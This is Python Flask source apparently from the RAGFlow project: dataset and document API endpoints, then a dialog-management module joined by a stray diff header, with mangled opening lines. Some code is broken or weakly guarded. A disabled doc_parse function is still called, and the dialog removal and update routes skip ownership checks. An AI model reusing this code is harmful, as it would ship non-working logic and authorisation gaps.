@login_required
|
||||
def get_dataset(dataset_id):
|
||||
try:
|
||||
dataset = KnowledgebaseService.get_detail(dataset_id)
|
||||
if not dataset:
|
||||
return construct_json_result(code=RetCode.DATA_ERROR, message="Can't find this dataset!")
|
||||
return construct_json_result(data=dataset, code=RetCode.SUCCESS)
|
||||
except Exception as e:
|
||||
return construct_json_result(e)


# ------------------------------ update a dataset --------------------------------------------

@manager.route("/<dataset_id>", methods=["PUT"])
@login_required
def update_dataset(dataset_id):
    req = request.json
    try:
        # the request body cannot be empty
        if not req:
            return construct_json_result(code=RetCode.DATA_ERROR, message="Please input at least one parameter that "
                                                                          "you want to update!")
        # check whether the dataset can be found
        if not KnowledgebaseService.query(created_by=current_user.id, id=dataset_id):
            return construct_json_result(message="Only the owner of the knowledgebase is authorized for this operation!",
                                         code=RetCode.OPERATING_ERROR)

        exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
        # check whether this dataset exists
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message="This dataset cannot be found!")

        if "name" in req:
            name = req["name"].strip()
            # check whether the name duplicates another dataset's name
            if name.lower() != dataset.name.lower() \
                    and len(KnowledgebaseService.query(name=name, tenant_id=current_user.id,
                                                       status=StatusEnum.VALID.value)) > 1:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message=f"The name: {name.lower()} is already used by other "
                                                     f"datasets. Please choose a different name.")

        dataset_updating_data = {}
        chunk_num = req.get("chunk_num")
        # modify the value of 11 parameters

        # 2 parameters: embedding id and chunk method
        # the user can update the embedding id only if chunk_num is 0
        if req.get("embedding_model_id"):
            if chunk_num == 0:
                dataset_updating_data["embd_id"] = req["embedding_model_id"]
            else:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="You have already parsed the document in this "
                                                     "dataset, so you cannot change the embedding "
                                                     "model.")
        # the user can update the chunk_method only if chunk_num is 0
        if "chunk_method" in req:
            type_value = req["chunk_method"]
            if is_illegal_value_for_enum(type_value, ParserType):
                return construct_json_result(message=f"Illegal value {type_value} for 'chunk_method' field.",
                                             code=RetCode.DATA_ERROR)
            if chunk_num != 0:
                # the error result must be returned, not merely constructed
                return construct_json_result(code=RetCode.DATA_ERROR, message="You have already parsed the document "
                                                                              "in this dataset, so you cannot "
                                                                              "change the chunk method.")
            dataset_updating_data["parser_id"] = req["chunk_method"]

        # convert the photo parameter to avatar
        if req.get("photo"):
            dataset_updating_data["avatar"] = req["photo"]

        # layout_recognize
        if "layout_recognize" in req:
            if "parser_config" not in dataset_updating_data:
                dataset_updating_data['parser_config'] = {}
            dataset_updating_data['parser_config']['layout_recognize'] = req['layout_recognize']

        # TODO: updating use_raptor needs to construct a class

        # 6 parameters
        for key in ["name", "language", "description", "permission", "id", "token_num"]:
            if key in req:
                dataset_updating_data[key] = req.get(key)

        # update
        if not KnowledgebaseService.update_by_id(dataset.id, dataset_updating_data):
            return construct_json_result(code=RetCode.OPERATING_ERROR, message="Failed to update! "
                                                                               "Please check the status of the RAGFlow "
                                                                               "server and try again!")

        exist, dataset = KnowledgebaseService.get_by_id(dataset.id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message="Failed to get the dataset "
                                                                          "using the dataset ID.")

        return construct_json_result(data=dataset.to_json(), code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)
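

# Illustrative client-side sketch (assumptions: base URL, mount point and
# session cookie are hypothetical). Renaming goes through the PUT endpoint
# above; changing "embedding_model_id" or "chunk_method" only succeeds while
# chunk_num is 0, i.e. before any document in the dataset has been parsed.
def _example_rename_dataset(dataset_id, new_name):
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}"  # assumed mount point
    resp = requests.put(url, json={"name": new_name},
                        cookies={"session": "<your-session-cookie>"})
    resp.raise_for_status()
    return resp.json()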


# --------------------------------content management ----------------------------------------------

# ----------------------------upload files-----------------------------------------------------
@manager.route("/<dataset_id>/documents/", methods=["POST"])
@login_required
def upload_documents(dataset_id):
    # no files
    if not request.files:
        return construct_json_result(
            message="There is no file!", code=RetCode.ARGUMENT_ERROR)

    # the number of uploaded files exceeds the limit
    file_objs = request.files.getlist("file")
    num_file_objs = len(file_objs)

    if num_file_objs > MAXIMUM_OF_UPLOADING_FILES:
        return construct_json_result(code=RetCode.DATA_ERROR, message=f"You try to upload {num_file_objs} files, "
                                                                      f"which exceeds the maximum number of uploading files: {MAXIMUM_OF_UPLOADING_FILES}")

    # no dataset
    exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
    if not exist:
        return construct_json_result(message="Can't find this dataset", code=RetCode.DATA_ERROR)

    for file_obj in file_objs:
        file_name = file_obj.filename
        # no name
        if not file_name:
            return construct_json_result(
                message="There is a file without name!", code=RetCode.ARGUMENT_ERROR)

        # TODO: support remote files
        if 'http' in file_name:
            return construct_json_result(code=RetCode.ARGUMENT_ERROR, message="Remote files are not supported yet.")

    # get the root_folder
    root_folder = FileService.get_root_folder(current_user.id)
    # get the id of the root_folder
    parent_file_id = root_folder["id"]  # document id
    # for a new user, create the '.knowledgebase' file
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # go inside this folder, get the kb_root_folder
    kb_root_folder = FileService.get_kb_folder(current_user.id)
    # link the file management to the kb_folder
    kb_folder = FileService.new_a_file_from_kb(dataset.tenant_id, dataset.name, kb_root_folder["id"])

    # collect all the errors
    err = []
    MAX_FILE_NUM_PER_USER = int(os.environ.get("MAX_FILE_NUM_PER_USER", 0))
    uploaded_docs_json = []
    for file in file_objs:
        try:
            # TODO: get this value from the database as some tenants have this limit while others don't
            if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(dataset.tenant_id) >= MAX_FILE_NUM_PER_USER:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="Exceed the maximum file number of a free user!")
            # deal with a duplicate name
            filename = duplicate_name(
                DocumentService.query,
                name=file.filename,
                kb_id=dataset.id)

            # deal with an unsupported type
            filetype = filename_type(filename)
            if filetype == FileType.OTHER.value:
                return construct_json_result(code=RetCode.DATA_ERROR,
                                             message="This type of file has not been supported yet!")

            # upload to the storage (minio by default)
            location = filename
            while STORAGE_IMPL.obj_exist(dataset_id, location):
                location += "_"

            blob = file.read()

            # the content is empty, raise a warning
            if blob == b'':
                warnings.warn(f"[WARNING]: The content of the file {filename} is empty.")

            STORAGE_IMPL.put(dataset_id, location, blob)

            doc = {
                "id": get_uuid(),
                "kb_id": dataset.id,
                "parser_id": dataset.parser_id,
                "parser_config": dataset.parser_config,
                "created_by": current_user.id,
                "type": filetype,
                "name": filename,
                "location": location,
                "size": len(blob),
                "thumbnail": thumbnail(filename, blob)
            }
            if doc["type"] == FileType.VISUAL:
                doc["parser_id"] = ParserType.PICTURE.value
            if doc["type"] == FileType.AURAL:
                doc["parser_id"] = ParserType.AUDIO.value
            if re.search(r"\.(ppt|pptx|pages)$", filename):
                doc["parser_id"] = ParserType.PRESENTATION.value
            DocumentService.insert(doc)

            FileService.add_file_from_kb(doc, kb_folder["id"], dataset.tenant_id)
            uploaded_docs_json.append(doc)
        except Exception as e:
            err.append(file.filename + ": " + str(e))

    if err:
        # return all the errors
        return construct_json_result(message="\n".join(err), code=RetCode.SERVER_ERROR)
    # success
    return construct_json_result(data=uploaded_docs_json, code=RetCode.SUCCESS)
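

# Illustrative client-side sketch (assumed base URL and cookie): uploading to
# the endpoint above uses a multipart form whose field name must be "file",
# matching request.files.getlist("file") in upload_documents().
def _example_upload_documents(dataset_id, paths):
    import os.path
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}/documents/"  # assumed mount point
    files = [("file", (os.path.basename(p), open(p, "rb"))) for p in paths]
    try:
        resp = requests.post(url, files=files,
                             cookies={"session": "<your-session-cookie>"})
        resp.raise_for_status()
        return resp.json()
    finally:
        for _, (_, fh) in files:
            fh.close()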


# ----------------------------delete a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["DELETE"])
@login_required
def delete_document(document_id, dataset_id):  # string
    # get the root folder
    root_folder = FileService.get_root_folder(current_user.id)
    # parent file's id
    parent_file_id = root_folder["id"]
    # consider a new user
    FileService.init_knowledgebase_docs(parent_file_id, current_user.id)
    # store all the errors that may occur
    errors = ""
    try:
        # does this document exist?
        exist, doc = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"Document {document_id} not found!", code=RetCode.DATA_ERROR)
        # is this doc authorized for this tenant?
        tenant_id = DocumentService.get_tenant_id(document_id)
        if not tenant_id:
            return construct_json_result(
                message=f"You cannot delete this document {document_id} for authorization"
                        f" reasons!", code=RetCode.AUTHENTICATION_ERROR)

        # get the doc's id and location
        real_dataset_id, location = File2DocumentService.get_minio_address(doc_id=document_id)

        if real_dataset_id != dataset_id:
            return construct_json_result(message=f"The document {document_id} is not in the dataset: {dataset_id}, "
                                                 f"but in the dataset: {real_dataset_id}.", code=RetCode.ARGUMENT_ERROR)

        # there was an issue while removing
        if not DocumentService.remove_document(doc, tenant_id):
            return construct_json_result(
                message="There was an error during the document removal process. Please check the status of the "
                        "RAGFlow server and try the removal again.", code=RetCode.OPERATING_ERROR)

        # fetch the File2Document record associated with the provided document ID.
        file_to_doc = File2DocumentService.get_by_document_id(document_id)
        # delete the associated File record.
        FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == file_to_doc[0].file_id])
        # delete the File2Document record itself using the document ID. This removes the
        # association between the document and the file after the File record has been deleted.
        File2DocumentService.delete_by_document_id(document_id)

        # delete it from the storage (minio by default)
        STORAGE_IMPL.rm(dataset_id, location)
    except Exception as e:
        errors += str(e)
    if errors:
        return construct_json_result(data=False, message=errors, code=RetCode.SERVER_ERROR)

    return construct_json_result(data=True, code=RetCode.SUCCESS)


# ----------------------------list files-----------------------------------------------------
@manager.route('/<dataset_id>/documents/', methods=['GET'])
@login_required
def list_documents(dataset_id):
    if not dataset_id:
        return construct_json_result(
            data=False, message="Lack of 'dataset_id'", code=RetCode.ARGUMENT_ERROR)

    # searching keywords
    keywords = request.args.get("keywords", "")

    offset = request.args.get("offset", 0)
    count = request.args.get("count", -1)
    order_by = request.args.get("order_by", "create_time")
    descend = request.args.get("descend", True)
    try:
        docs, total = DocumentService.list_documents_in_dataset(dataset_id, int(offset), int(count), order_by,
                                                                descend, keywords)

        # the return code belongs in "code", not "message"
        return construct_json_result(data={"total": total, "docs": docs}, code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)
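

# Illustrative client-side sketch (assumed base URL and cookie): paging through
# the documents of a dataset with the GET endpoint above. count=-1 mirrors the
# server-side default and returns all remaining documents.
def _example_list_documents(dataset_id, keywords=""):
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}/documents/"  # assumed mount point
    params = {"offset": 0, "count": -1, "order_by": "create_time",
              "descend": True, "keywords": keywords}
    resp = requests.get(url, params=params, cookies={"session": "<your-session-cookie>"})
    resp.raise_for_status()
    body = resp.json()["data"]
    return body["total"], body["docs"]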


# ----------------------------update: enable rename-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["PUT"])
@login_required
def update_document(dataset_id, document_id):
    req = request.json
    try:
        # the request body cannot be empty; this check must run before the
        # parameter validation below, which iterates over req
        if not req:
            return construct_json_result(
                code=RetCode.DATA_ERROR,
                message="Please input at least one parameter that you want to update!")

        legal_parameters = set()
        legal_parameters.add("name")
        legal_parameters.add("enable")
        legal_parameters.add("template_type")

        for key in req.keys():
            if key not in legal_parameters:
                return construct_json_result(code=RetCode.ARGUMENT_ERROR, message=f"{key} is an illegal parameter.")

        # check whether this dataset exists
        exist, dataset = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR, message=f"This dataset {dataset_id} cannot be found!")

        # the document does not exist
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document {document_id} cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # deal with the different keys
        updating_data = {}
        if "name" in req:
            new_name = req["name"]
            # check whether the new_name is suitable
            # 1. no name value
            if not new_name:
                return construct_json_result(code=RetCode.DATA_ERROR, message="There is no new name.")

            # 2. strip any leading or trailing whitespace
            new_name = new_name.strip()

            # 3. check whether the new_name keeps the same file extension as before
            if pathlib.Path(new_name.lower()).suffix != pathlib.Path(
                    document.name.lower()).suffix:
                return construct_json_result(
                    data=False,
                    message="The extension of the file cannot be changed",
                    code=RetCode.ARGUMENT_ERROR)

            # 4. check whether the new name is already occupied by another file
            for d in DocumentService.query(name=new_name, kb_id=document.kb_id):
                if d.name == new_name:
                    return construct_json_result(
                        message="Duplicated document name in the same dataset.",
                        code=RetCode.ARGUMENT_ERROR)

            # store the validated, stripped name
            updating_data["name"] = new_name

        if "enable" in req:
            enable_value = req["enable"]
            if is_illegal_value_for_enum(enable_value, StatusEnum):
                return construct_json_result(message=f"Illegal value {enable_value} for 'enable' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["status"] = enable_value

        # TODO: Chunk-method - update parameters inside the json object parser_config
        if "template_type" in req:
            type_value = req["template_type"]
            if is_illegal_value_for_enum(type_value, ParserType):
                return construct_json_result(message=f"Illegal value {type_value} for 'template_type' field.",
                                             code=RetCode.DATA_ERROR)
            updating_data["parser_id"] = req["template_type"]

        # the process of updating
        if not DocumentService.update_by_id(document_id, updating_data):
            return construct_json_result(
                code=RetCode.OPERATING_ERROR,
                message="Failed to update document in the database! "
                        "Please check the status of the RAGFlow server and try again!")

        # name part: file service
        if "name" in req:
            # get the file by document id
            file_information = File2DocumentService.get_by_document_id(document_id)
            if file_information:
                exist, file = FileService.get_by_id(file_information[0].file_id)
                FileService.update_by_id(file.id, {"name": updating_data["name"]})

        exist, document = DocumentService.get_by_id(document_id)

        # success
        return construct_json_result(data=document.to_json(), message="Success", code=RetCode.SUCCESS)
    except Exception as e:
        return construct_error_response(e)


# Helper method to judge whether a value is illegal for the given enum
def is_illegal_value_for_enum(value, enum_class):
    return value not in enum_class.__members__.values()
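

# Minimal sketch of the helper above: a value is "legal" when it equals one of
# the members yielded by __members__.values(). Whether a raw string such as "1"
# matches depends on the enum's base class (a str-based enum compares equal to
# its value, a plain Enum does not), which is why callers pass request values
# through unchanged and let the enum decide.
def _example_enum_check():
    # an arbitrary string is never a member, whatever the base class
    assert is_illegal_value_for_enum("definitely-not-a-member", StatusEnum)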


# ----------------------------download a file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>", methods=["GET"])
@login_required
def download_document(dataset_id, document_id):
    try:
        # check whether this dataset exists
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset '{dataset_id}' cannot be found!")

        # check whether this document exists
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document '{document_id}' cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        # the process of downloading
        doc_id, doc_location = File2DocumentService.get_minio_address(doc_id=document_id)  # minio address
        file_stream = STORAGE_IMPL.get(doc_id, doc_location)
        if not file_stream:
            return construct_json_result(message="This file is empty.", code=RetCode.DATA_ERROR)

        file = BytesIO(file_stream)

        # use send_file with a proper filename and MIME type
        return send_file(
            file,
            as_attachment=True,
            download_name=document.name,
            mimetype='application/octet-stream'  # set a default MIME type
        )

    # error
    except Exception as e:
        return construct_error_response(e)
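

# Illustrative client-side sketch (assumed base URL and cookie): the GET
# endpoint above streams the raw bytes back as an attachment with an
# octet-stream MIME type, so a client simply writes the body to disk.
def _example_download_document(dataset_id, document_id, out_path):
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}/documents/{document_id}"  # assumed mount point
    resp = requests.get(url, cookies={"session": "<your-session-cookie>"})
    resp.raise_for_status()
    with open(out_path, "wb") as fh:
        fh.write(resp.content)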


# ----------------------------start parsing a document-----------------------------------------------------
# helper method for parsing
# callback method
def doc_parse_callback(doc_id, prog=None, msg=""):
    cancel = DocumentService.do_cancel(doc_id)
    if cancel:
        raise Exception("The parsing process has been cancelled!")


# NOTE: doc_parse below is disabled (kept inside a string literal), yet
# parsing_document_internal() still calls it; re-enable it and import the
# chunkers it needs before routing parse requests through this module.
"""
def doc_parse(binary, doc_name, parser_name, tenant_id, doc_id):
    match parser_name:
        case "book":
            book.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "laws":
            laws.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "manual":
            manual.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "naive":
            # the default mode, shown as "General" in the front-end
            naive.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "one":
            one.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "paper":
            paper.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "picture":
            picture.chunk(doc_name, binary=binary, tenant_id=tenant_id, lang="Chinese",
                          callback=partial(doc_parse_callback, doc_id))
        case "presentation":
            presentation.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "qa":
            qa.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "resume":
            resume.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "table":
            table.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "audio":
            audio.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case "email":
            email.chunk(doc_name, binary=binary, callback=partial(doc_parse_callback, doc_id))
        case _:
            return False

    return True
"""


@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["POST"])
@login_required
def parse_document(dataset_id, document_id):
    try:
        # valid dataset
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset '{dataset_id}' cannot be found!")

        return parsing_document_internal(document_id)

    except Exception as e:
        return construct_error_response(e)


# ----------------------------start parsing documents-----------------------------------------------------
@manager.route("/<dataset_id>/documents/status", methods=["POST"])
@login_required
def parse_documents(dataset_id):
    doc_ids = request.json["doc_ids"]
    try:
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset '{dataset_id}' cannot be found!")
        # two conditions
        if not doc_ids:
            # parse all documents inside the dataset
            docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
                                                                    True, "")
            doc_ids = [doc["id"] for doc in docs]

        message = ""
        # parse the documents one by one
        for doc_id in doc_ids:
            res = parsing_document_internal(doc_id)
            res_body = res.json
            if res_body["code"] == RetCode.SUCCESS:
                message += res_body["message"]
            else:
                return res
        return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)

    except Exception as e:
        return construct_error_response(e)
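

# Illustrative client-side sketch (assumed base URL and cookie): POSTing to the
# batch status endpoint above with an empty "doc_ids" list asks the server to
# parse every document in the dataset, as implemented in parse_documents().
def _example_parse_all_documents(dataset_id):
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}/documents/status"  # assumed mount point
    resp = requests.post(url, json={"doc_ids": []},
                         cookies={"session": "<your-session-cookie>"})
    resp.raise_for_status()
    return resp.json()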


# helper method for parsing one document
def parsing_document_internal(document_id):
    message = ""
    try:
        # check whether this document exists
        exist, document = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document '{document_id}' cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)

        tenant_id = DocumentService.get_tenant_id(document_id)
        if not tenant_id:
            return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)

        info = {"run": "1", "progress": 0}
        info["progress_msg"] = ""
        info["chunk_num"] = 0
        info["token_num"] = 0

        DocumentService.update_by_id(document_id, info)

        ELASTICSEARCH.deleteByQuery(Q("match", doc_id=document_id), idxnm=search.index_name(tenant_id))

        _, doc_attributes = DocumentService.get_by_id(document_id)
        doc_attributes = doc_attributes.to_dict()
        doc_id = doc_attributes["id"]

        bucket, doc_name = File2DocumentService.get_minio_address(doc_id=doc_id)
        binary = STORAGE_IMPL.get(bucket, doc_name)
        parser_name = doc_attributes["parser_id"]
        if binary:
            # NOTE: doc_parse is currently disabled above and must be re-enabled
            # before this call can succeed
            res = doc_parse(binary, doc_name, parser_name, tenant_id, doc_id)
            if res is False:
                message += f"The parser id: {parser_name} of the document {doc_id} is not supported; "
        else:
            message += f"Empty data in the document: {doc_name}; "
        # parsing failed
        if doc_attributes["status"] == TaskStatus.FAIL.value:
            message += f"Failed to parse the document: {doc_id}; "
        return construct_json_result(code=RetCode.SUCCESS, message=message)
    except Exception as e:
        return construct_error_response(e)


# ----------------------------stop parsing a doc-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["DELETE"])
@login_required
def stop_parsing_document(dataset_id, document_id):
    try:
        # valid dataset
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset '{dataset_id}' cannot be found!")

        return stop_parsing_document_internal(document_id)

    except Exception as e:
        return construct_error_response(e)


# ----------------------------stop parsing docs-----------------------------------------------------
@manager.route("/<dataset_id>/documents/status", methods=["DELETE"])
@login_required
def stop_parsing_documents(dataset_id):
    doc_ids = request.json["doc_ids"]
    try:
        # valid dataset?
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset '{dataset_id}' cannot be found!")
        if not doc_ids:
            # stop every document inside the dataset
            docs, total = DocumentService.list_documents_in_dataset(dataset_id, 0, -1, "create_time",
                                                                    True, "")
            doc_ids = [doc["id"] for doc in docs]

        message = ""
        # stop the documents one by one
        for doc_id in doc_ids:
            res = stop_parsing_document_internal(doc_id)
            res_body = res.json
            if res_body["code"] == RetCode.SUCCESS:
                message += res_body["message"]
            else:
                return res
        return construct_json_result(data=True, code=RetCode.SUCCESS, message=message)

    except Exception as e:
        return construct_error_response(e)


# Helper method
def stop_parsing_document_internal(document_id):
    try:
        # valid doc?
        exist, doc = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(message=f"This document '{document_id}' cannot be found!",
                                         code=RetCode.ARGUMENT_ERROR)
        doc_attributes = doc.to_dict()

        # we only need to stop a document whose status is "parsing"
        if doc_attributes["status"] == TaskStatus.RUNNING.value:
            tenant_id = DocumentService.get_tenant_id(document_id)
            if not tenant_id:
                return construct_json_result(message="Tenant not found!", code=RetCode.AUTHENTICATION_ERROR)

            # did the update succeed?
            if not DocumentService.update_by_id(document_id, {"status": "2"}):  # cancel
                return construct_json_result(
                    code=RetCode.OPERATING_ERROR,
                    message="There was an error while stopping the document parsing process. "
                            "Please check the status of the RAGFlow server and try the update again."
                )

            _, doc_attributes = DocumentService.get_by_id(document_id)
            doc_attributes = doc_attributes.to_dict()

            # stopping the parsing failed
            if doc_attributes["status"] == TaskStatus.RUNNING.value:
                return construct_json_result(message=f"Failed to stop parsing the document: {document_id}; ", code=RetCode.SUCCESS)
        return construct_json_result(code=RetCode.SUCCESS, message="")
    except Exception as e:
        return construct_error_response(e)


# ----------------------------show the status of the file-----------------------------------------------------
@manager.route("/<dataset_id>/documents/<document_id>/status", methods=["GET"])
@login_required
def show_parsing_status(dataset_id, document_id):
    try:
        # valid dataset
        exist, _ = KnowledgebaseService.get_by_id(dataset_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This dataset: '{dataset_id}' cannot be found!")
        # valid document (reuse the fetched object instead of querying twice)
        exist, doc = DocumentService.get_by_id(document_id)
        if not exist:
            return construct_json_result(code=RetCode.DATA_ERROR,
                                         message=f"This document: '{document_id}' is not a valid document.")

        doc_attributes = doc.to_dict()

        return construct_json_result(
            data={"progress": doc_attributes["progress"], "status": TaskStatus(doc_attributes["status"]).name},
            code=RetCode.SUCCESS
        )
    except Exception as e:
        return construct_error_response(e)
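

# Illustrative client-side sketch (assumed base URL and cookie): polling the
# status endpoint above until the document leaves the RUNNING state. The
# response's "status" field is a TaskStatus name; the polling interval is an
# arbitrary choice.
def _example_wait_for_parsing(dataset_id, document_id, interval=2.0):
    import time
    import requests

    url = f"http://127.0.0.1:9380/v1/dataset/{dataset_id}/documents/{document_id}/status"  # assumed mount point
    while True:
        resp = requests.get(url, cookies={"session": "<your-session-cookie>"})
        resp.raise_for_status()
        data = resp.json()["data"]
        if data["status"] != "RUNNING":
            return data
        time.sleep(interval)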


# ----------------------------list the chunks of the file-----------------------------------------------------

# ----------------------------delete the chunk-----------------------------------------------------

# ----------------------------edit the status of the chunk-----------------------------------------------------

# ----------------------------insert a new chunk-----------------------------------------------------

# ----------------------------upload a file-----------------------------------------------------

# ----------------------------get a specific chunk-----------------------------------------------------

# ----------------------------retrieval test-----------------------------------------------------

@@ -1,164 +1,183 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

from flask import request
from flask_login import login_required, current_user
from api.db.services.dialog_service import DialogService
from api.db import StatusEnum
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils import get_uuid
from api.utils.api_utils import get_json_result


@manager.route('/set', methods=['POST'])
@login_required
def set_dialog():
    req = request.json
    dialog_id = req.get("dialog_id")
    name = req.get("name", "New Dialog")
    description = req.get("description", "A helpful Dialog")
    top_n = req.get("top_n", 6)
    similarity_threshold = req.get("similarity_threshold", 0.1)
    vector_similarity_weight = req.get("vector_similarity_weight", 0.3)
    llm_setting = req.get("llm_setting", {})
    default_prompt = {
        "system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
以下是知识库:
{knowledge}
以上是知识库。""",
        "prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
        "parameters": [
            {"key": "knowledge", "optional": False}
        ],
        "empty_response": "Sorry! 知识库中未找到相关内容!"
    }
    prompt_config = req.get("prompt_config", default_prompt)

    if not prompt_config["system"]:
        prompt_config["system"] = default_prompt["system"]
    # if len(prompt_config["parameters"]) < 1:
    #     prompt_config["parameters"] = default_prompt["parameters"]
    # for p in prompt_config["parameters"]:
    #     if p["key"] == "knowledge":break
    # else: prompt_config["parameters"].append(default_prompt["parameters"][0])

    for p in prompt_config["parameters"]:
        if p["optional"]:
            continue
        if prompt_config["system"].find("{%s}" % p["key"]) < 0:
            return get_data_error_result(
                retmsg="Parameter '{}' is not used".format(p["key"]))

    try:
        e, tenant = TenantService.get_by_id(current_user.id)
        if not e:
            return get_data_error_result(retmsg="Tenant not found!")
        llm_id = req.get("llm_id", tenant.llm_id)
        if not dialog_id:
            if not req.get("kb_ids"):
                return get_data_error_result(
                    retmsg="Fail! Please select knowledgebase!")
            dia = {
                "id": get_uuid(),
                "tenant_id": current_user.id,
                "name": name,
                "kb_ids": req["kb_ids"],
                "description": description,
                "llm_id": llm_id,
                "llm_setting": llm_setting,
                "prompt_config": prompt_config,
                "top_n": top_n,
                "similarity_threshold": similarity_threshold,
                "vector_similarity_weight": vector_similarity_weight
            }
            if not DialogService.save(**dia):
                return get_data_error_result(retmsg="Fail to new a dialog!")
            e, dia = DialogService.get_by_id(dia["id"])
            if not e:
                return get_data_error_result(retmsg="Fail to new a dialog!")
            return get_json_result(data=dia.to_json())
        else:
            del req["dialog_id"]
            if "kb_names" in req:
                del req["kb_names"]
            if not DialogService.update_by_id(dialog_id, req):
                return get_data_error_result(retmsg="Dialog not found!")
            e, dia = DialogService.get_by_id(dialog_id)
            if not e:
                return get_data_error_result(retmsg="Fail to update a dialog!")
            dia = dia.to_dict()
            dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
            return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


@manager.route('/get', methods=['GET'])
@login_required
def get():
    dialog_id = request.args["dialog_id"]
    try:
        e, dia = DialogService.get_by_id(dialog_id)
        if not e:
            return get_data_error_result(retmsg="Dialog not found!")
        dia = dia.to_dict()
        dia["kb_ids"], dia["kb_names"] = get_kb_names(dia["kb_ids"])
        return get_json_result(data=dia)
    except Exception as e:
        return server_error_response(e)


def get_kb_names(kb_ids):
    ids, nms = [], []
    for kid in kb_ids:
        e, kb = KnowledgebaseService.get_by_id(kid)
        if not e or kb.status != StatusEnum.VALID.value:
            continue
        ids.append(kid)
        nms.append(kb.name)
    return ids, nms


@manager.route('/list', methods=['GET'])
@login_required
def list_dialogs():
    try:
        diags = DialogService.query(
            tenant_id=current_user.id,
            status=StatusEnum.VALID.value,
            reverse=True,
            order_by=DialogService.model.create_time)
        diags = [d.to_dict() for d in diags]
        for d in diags:
            d["kb_ids"], d["kb_names"] = get_kb_names(d["kb_ids"])
        return get_json_result(data=diags)
    except Exception as e:
        return server_error_response(e)


@manager.route('/rm', methods=['POST'])
@login_required
@validate_request("dialog_ids")
def rm():
    req = request.json
    try:
        DialogService.update_many_by_id(
            [{"id": id, "status": StatusEnum.INVALID.value} for id in req["dialog_ids"]])
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
